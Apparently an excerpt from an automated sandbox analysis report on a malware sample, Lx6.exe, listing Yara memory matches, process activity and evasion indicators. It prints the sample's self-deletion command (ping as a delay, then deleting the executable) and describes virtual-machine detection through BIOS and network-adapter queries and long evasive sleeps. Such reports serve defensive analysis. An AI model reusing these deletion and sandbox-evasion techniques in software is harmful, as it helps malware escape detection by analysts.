Source: Yara match File source: 0000001B.00000002.858783348.000001D023E02000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.682621929.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.442938704.0000000003F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003E.00000002.795032491.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.683222673.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Lx6.exe PID: 1172, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 4292, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 3124, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4372, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4552, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmd.exe PID: 5832, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmd.exe PID: 1920, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 6064, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: csc.exe PID: 5836, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cvtres.exe PID: 1716, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: csc.exe PID: 3536, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cvtres.exe PID: 5240, type: MEMORYSTR
Source: Yara match File source: 0.3.Lx6.exe.d294a0.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Lx6.exe.420000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.Lx6.exe.d294a0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.Lx6.exe.109d4a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.Lx6.exe.109d4a0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.Lx6.exe.111c4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.Lx6.exe.1148948.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000043.00000000.773575293.000001FA9D6F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.389553565.000000000109D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.493910135.000000000111D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000043.00000000.771438221.000001FA9D6F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000000.667603922.000001489BB00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.389654961.000000000111C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000043.00000000.769688179.000001FA9D6F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000000.703497252.000001CEDB3E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003E.00000000.763965956.0000019933F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000000.596069262.000002240CA50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000000.704474059.000001CEDB3E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003E.00000000.762259112.0000019933F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000000.681894423.0000000003020000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000059.00000000.816576347.000001AF8B6D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003E.00000000.760746671.0000019933F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.495743811.0000000000D29000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000000.702640862.000001CEDB3E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000059.00000000.818431890.000001AF8B6D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000059.00000000.820005242.000001AF8B6D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000000.656463020.000001489BB00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000058.00000000.802729381.0000024EF5620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000000.625911169.000001D023AD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000000.630294105.000001D023AD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000000.590960903.000002240CA50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000000.680178718.0000000003020000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.814285126.0000021F457F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000000.576910703.000002240CA50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.495247062.0000000001148000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000000.681232862.0000000003020000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.497852767.0000000001181000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000058.00000000.801073925.0000024EF5620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000058.00000000.799390295.0000024EF5620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000000.635166996.000001D023AD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000000.673085569.000001489BB00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Self deletion via cmd or bat file
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\Lx6.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\Lx6.exe Jump to behavior
Source: C:\Users\user\Desktop\Lx6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Lx6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\control.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Uses ping.exe to sleep
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\Lx6.exe TID: 4728 Thread sleep count: 43 > 30 Jump to behavior
Source: C:\Users\user\Desktop\Lx6.exe TID: 4728 Thread sleep count: 33 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3156 Thread sleep time: -2767011611056431s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4888 Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4888 Thread sleep time: -922337203685477s >= -30000s
Found evasive API chain (date check)
Source: C:\Users\user\Desktop\Lx6.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Windows\SysWOW64\cmd.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
